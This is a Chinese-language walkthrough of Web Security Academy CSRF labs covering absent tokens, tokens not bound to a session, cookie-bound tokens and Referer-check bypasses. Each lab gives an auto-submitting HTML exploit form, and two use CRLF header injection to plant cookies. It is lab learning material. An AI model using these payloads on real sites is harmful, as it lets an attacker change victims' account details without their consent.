没有防御的 CSRF 漏洞(1)
data:image/s3,"s3://crabby-images/70d40/70d404f0c801e3f3699790cbd90ab99d86c5180d" alt="image-20221123215555296"
给了个账号 我们先登进去
存在一个更改邮箱的页面 我们可以看到没有任何的防护 说明是存在csrf漏洞的
data:image/s3,"s3://crabby-images/cac48/cac485af010a208867858a9602838c61baafde22" alt="image-20221123215940081"
我们可以选择自己写html文件 也可以使用burp自带的工具来生成
data:image/s3,"s3://crabby-images/ffaf7/ffaf7ed34a51d7aca33473348ff8c4963a62ab30" alt="image-20221123220104003"
可以选择自动提交
data:image/s3,"s3://crabby-images/70ae1/70ae16063ecb50332d2d18fbd911511b1eddb51d" alt="image-20221123220156684"
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://0a6b008c04c81b0fc0979ae1008f0096.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="11@qq.com" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>
|
data:image/s3,"s3://crabby-images/d249b/d249b193a6d5c38235ed16299669d5279ba81d89" alt="image-20221123221523412"
CSRF,其中令牌验证取决于请求方法(2)
这里的意思就是只有post才会验证csrf参数
data:image/s3,"s3://crabby-images/6d362/6d3628db00760327e3641a647cdc2bfdd3ce1d21" alt="image-20221123222347049"
登录之后是有发现csrf的值的
data:image/s3,"s3://crabby-images/13ca9/13ca9cf6bf2ad65a01a522360d17a5967b1c2572" alt="image-20221124105543020"
正常提交是没有问题的
data:image/s3,"s3://crabby-images/805ae/805ae60f99cb687d443c2e370515e89d281e4d15" alt="image-20221124105651125"
当csrf token的值为假时 是失败的
data:image/s3,"s3://crabby-images/0f89f/0f89fb4308c97919befa1493e41c6c9781cc5d67" alt="image-20221124105803135"
这时转换请求方法进行尝试 发现成功更改并未使用csrf
data:image/s3,"s3://crabby-images/4e567/4e567ba0e8f3471cb6367b7f4075922a4e0c288c" alt="image-20221124110012926"
生成下
data:image/s3,"s3://crabby-images/119f2/119f2b494c5a8e582b84e6f146130ccda4728d66" alt="image-20221124110233980"
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://0a7600ab043d4850c0c3640b00e80046.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="22@qq.com" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>
|
data:image/s3,"s3://crabby-images/aadea/aadeae05c32e3ce7fdfc5dccf81643c09f5deef0" alt="image-20221124110753418"
CSRF,其中令牌验证取决于令牌是否存在(3)
data:image/s3,"s3://crabby-images/22330/2233016f4f255ac448f5ecabba66191737db81ff" alt="image-20221124110946591"
正常是没有问题的
data:image/s3,"s3://crabby-images/59a45/59a4546221bebe972e0ce4ce7f0fd0ecab790242" alt="image-20221124111004255"
data:image/s3,"s3://crabby-images/aa3be/aa3bef8e94c173cbbdca016be3f48b0a4ad3a41a" alt="image-20221124111027729"
发现没有csrf也可以
data:image/s3,"s3://crabby-images/0428a/0428aa78aac682d9b2c721d6b052c78e1dd496d6" alt="image-20221124111038130"
data:image/s3,"s3://crabby-images/046e3/046e36fc42dcc2733c10f060502ae146574eb893" alt="image-20221124111105919"
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://0a2f00b204e7242dc043093000bf00c1.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="11@qq.com" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>
|
data:image/s3,"s3://crabby-images/2a4dd/2a4ddcc94a0ea355b1a8211651453d9803e052ae" alt="image-20221124111355644"
令牌未绑定到用户会话的 CSRF(4)
意思是 你的token 也可以给别人用
data:image/s3,"s3://crabby-images/4099b/4099b9cdf9683596703ad6c8c34935d4efc6a2e5" alt="image-20221124114906401"
给了两个账号 先用第一个登录
data:image/s3,"s3://crabby-images/9d444/9d444ec7db64573668a487d53a995daa3f893f7e" alt="image-20221124115014918"
开无痕 登录第二个
data:image/s3,"s3://crabby-images/ad088/ad088a40ad81aef348cc478cf384cdb1893a830f" alt="image-20221124115047901"
data:image/s3,"s3://crabby-images/ad618/ad618971bb6f089c80c0b4e6b320aca21b0790e3" alt="image-20221124115124720"
先在第一个用户修改email时抓包 拿到token 接着把包丢弃
data:image/s3,"s3://crabby-images/7181b/7181b2641017a41e52e73cf9e6e8d99a0e1f58ba" alt="image-20221124120425224"
dWQAl6bbzXLt8aHvmxCQS2XdS7eSI0Y7
|
接着修改第二个 email 其中token换成第一个拿到的值
data:image/s3,"s3://crabby-images/7195c/7195cba5113a3c32db9e418b6d55d344e51c36b0" alt="image-20221124120457306"
发现成功更改
data:image/s3,"s3://crabby-images/a3178/a317867895399f790977b0ccd815e978a1e00cf4" alt="image-20221124120348774"
data:image/s3,"s3://crabby-images/7a879/7a8799b9b1197732c2ee0dbba0feafb48a339535" alt="image-20221124120515071"
因此我们采用相同的方式构造
抓包
data:image/s3,"s3://crabby-images/53059/530593dc794712585cddfbdcfa93a0a595b7d30c" alt="image-20221124120633517"
data:image/s3,"s3://crabby-images/32512/32512604fe0a95475629c5b9a6f3a5454d9375c0" alt="image-20221124120646033"
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://0ae3006003973e43c0341aeb00c9003c.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="123456@test.com" /> <input type="hidden" name="csrf" value="7nrtppYE23F8qs3oB0VA2RGJ1W5foM0I" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>
|
记得丢弃抓到的包
data:image/s3,"s3://crabby-images/ae5d2/ae5d2747f0e5aa0b56abd9c9c4b40e0ac7b9818e" alt="image-20221124120747877"
CSRF,其中令牌绑定到非会话 cookie(5)
data:image/s3,"s3://crabby-images/e59c1/e59c16e53d87830fe1c4ea0865b9a6c2655287fe" alt="image-20221124121104561"
同样抓到包 发现存在csrf 和 cookie中的csrfKey两个值
data:image/s3,"s3://crabby-images/43ad6/43ad6ac2d4e6bfa34e1df0a40837ce335c660404" alt="image-20221124121214284"
正常
data:image/s3,"s3://crabby-images/41bb7/41bb7b9d852ac296d2f7e675aad74cb88e16ba52" alt="image-20221124121419228"
再次发送
data:image/s3,"s3://crabby-images/210e3/210e371f423cfc5bb9d83c4603e5b5b066fc38a3" alt="image-20221124121523510"
发现是可以复用的
尝试登录另一个账号
我们把第一个账号的两个参数都拿过来
data:image/s3,"s3://crabby-images/924d5/924d55cba4a41611bf25cd9b3825b19a45694822" alt="image-20221124121852371"
发现没有绑定 到账号上面
data:image/s3,"s3://crabby-images/d213b/d213b887831a0ef31fc4016442010a8be1058336" alt="image-20221124121901657"
那么我们现在需要做的就是在别人的请求包中添加上这个cookie csrfKey和 csrf
这里有一个search 发现可以给cookie进行赋值
data:image/s3,"s3://crabby-images/2b826/2b826712f3e784f29567706502d9c33ae54e57f5" alt="image-20221124122729763"
这样就设置好了 csrfkey 通过换行就能设置好了
data:image/s3,"s3://crabby-images/f2d29/f2d29b8bb99fedbf306a6dc672f0ef715e8e4443" alt="image-20221124125836797"
data:image/s3,"s3://crabby-images/4db03/4db03151d8c4f60b144ade1b4843666c18b8fa20" alt="image-20221124130535385"
稍微修改一下
data:image/s3,"s3://crabby-images/584e1/584e116dfc8af0e3b734ec7563171d1ce56ce86c" alt="image-20221124130609974"
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://0a410098031c7fd3c13b523700e20056.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="123456@test.com" /> <input type="hidden" name="csrf" value="Hc4LgCKxybDhQWK6hriRpAGfzKPue6l6" /> <input type="submit" value="Submit request" /> </form> <img src="https://0a410098031c7fd3c13b523700e20056.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=q8gTQcg4f8qsNCBamHWnMFTnCQL44BLb%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html>
|
data:image/s3,"s3://crabby-images/2e686/2e6861478e9e903ce0c121d6122f21cb955583a4" alt="image-20221124130846208"
CSRF,其中 token 在 cookie 中重复
data:image/s3,"s3://crabby-images/987a2/987a21c1cda1c06a51853e637e65f18f6e785908" alt="image-20221124130950192"
和上一道差不多
data:image/s3,"s3://crabby-images/2148f/2148f70fabea4f27c3da5a0ca4ecc9b7ed74b3d6" alt="image-20221124131539345"
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://0a9c004903734ce1c082303e0015007f.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="123456@test.com" /> <input type="hidden" name="csrf" value="UvH5CgyvuAIvKbZOxplKV5XwHoRJD0AL" /> <input type="submit" value="Submit request" /> </form> <img src="https://0a9c004903734ce1c082303e0015007f.web-security-academy.net/?search=1%0d%0aSet-Cookie:%20csrf=UvH5CgyvuAIvKbZOxplKV5XwHoRJD0AL%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html>
|
data:image/s3,"s3://crabby-images/fd591/fd5910e559b613176b6f44ed45685d53104bf4fa" alt="image-20221124131927712"
CSRF,其中 Referer 验证取决于标头是否存在
data:image/s3,"s3://crabby-images/ae7ff/ae7ff6e5874906e8d881668fa36c5a0c615ff757" alt="image-20221124132720311"
当更改referer的时候请求被拒绝
data:image/s3,"s3://crabby-images/e33e5/e33e520e1f636c8d94468a1edd0cca06a9cc467d" alt="image-20221124132708791"
但是完全删除请求可以被接受
data:image/s3,"s3://crabby-images/f1335/f1335937e9e3da8c010562349a29e75bda0e0138" alt="image-20221124132744354"
<html> <head> <meta name="referrer" content="no-referrer"/> </head> <body> <script>history.pushState('', '', '/')</script> <form action="https://0a0e00cb04f5a2e4c0fba1a3000700a7.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="123456@test.com" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>
|
添加no-referrer
data:image/s3,"s3://crabby-images/25b9a/25b9a837985b5fd0cd36db6695a91f560e400048" alt="image-20221124133826361"
CSRF 与损坏的 Referer 验证
data:image/s3,"s3://crabby-images/ca451/ca451a35246074d6572cb15817d538415fbfd458" alt="image-20221124134953860"
同样是referer
data:image/s3,"s3://crabby-images/05f04/05f04db5a29c670f1ba87d32ab0215a4ca5005dc" alt="image-20221124134940838"
当referer中包含这一字符时即可
data:image/s3,"s3://crabby-images/fc67a/fc67a3d9980833e18cc640d1ac4e023dae3d7bc7" alt="image-20221124135027089"
data:image/s3,"s3://crabby-images/b7b5b/b7b5b648e41076e301cf81e74d55d5bb05fd1fa5" alt="image-20221124135231232"
我们来看payload
<html> <head> <meta name="referrer" content="unsafe-url"/> </head> <body> <script>history.pushState('', '', '/?https://0a0700ee03ef7fabc1205a9500ee00cf.web-security-academy.net')</script> <form action="https://0a0700ee03ef7fabc1205a9500ee00cf.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="123456@test.com" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>
|
其中 history.pushState 可以无刷新的在当前history中插入一条历史状态
这里还需要添加 unsafe-url
data:image/s3,"s3://crabby-images/5a184/5a1849fdde0b2bae73b47736a171dab6633b0550" alt="image-20221124140840565"